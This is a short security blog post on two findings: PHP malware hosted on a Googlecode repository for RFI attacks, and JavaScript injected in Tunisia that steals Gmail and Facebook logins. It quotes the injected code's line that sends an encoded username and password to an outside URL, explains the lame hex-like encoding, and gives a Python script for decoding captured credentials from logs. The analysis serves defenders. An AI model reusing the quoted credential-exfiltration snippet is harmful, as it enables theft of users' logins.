Googlecode for haxors.

I have just found on one of my honeypots that web haxors are now using Googlecode to store their PHP malwares. These malwares are injected on various websites by using RFI vulnerabilities. The most active repo is majitoz.googlecode.com. You can browse the malwares in the downloads category. Sadly, there is nothing interesting at the moment, just fucking well-known PHP/PERL malwares.

UPDATE: Google has been informed and majitoz has been taken down. Great reactivity.

Tunisia haxors...

Some people speak about the JS injected code done in Tunisia when you try to access website like gmail, facebook... They say that the credentials are sent in clear text in the evil wo0dh3ad URL but it is not totally true since there is a very small encoding like we can see in this snippet.

var url = "www.fessebook.com/wo0dh3ad?q="+r5t(5)+"&u="+h6h(us3r)+"&p="+h6h(pa55);

us3r and pa55 are encoded using the h6h() function which is:

function h6h(st)
{
 for(i=0;i<st.length;i++) {
  c=st.charCodeAt(i);
  ch=(c&0xF0)>>4;
  cl=c&0x0F;
  st2=st2+String.fromCharCode(ch+97)+String.fromCharCode(cl+97);
 }
 return st2;
}

It just loops through the string, splits each 8 bits char in two numbers of 4 bits. Then it creates two new chars (chr()) by adding 97 (ord('a')) to each number and concatenates them to the encoded string which is returned and inserted in URL. A bit lame isn't it? :-)

To decode us3r and pa55 from your logs, you can use this silly (no bounds checking) python script:

[clem1@blah ~]$ cat unh6h.py
import sys
def unh6h(string):
 u = ""
 for i in range(0, len(string), 2):
  s = ord(string[i])-97
  s <<= 4
  s += ord(string[i+1])-97
  u += chr(s)
 return u
print(unh6h(sys.argv[1])) 

A quick test:

>>> h6h("password")
"hagbhdhdhhgphcge"
[clem1@blah ~]$ python unh6h.py "hagbhdhdhhgphcge"
password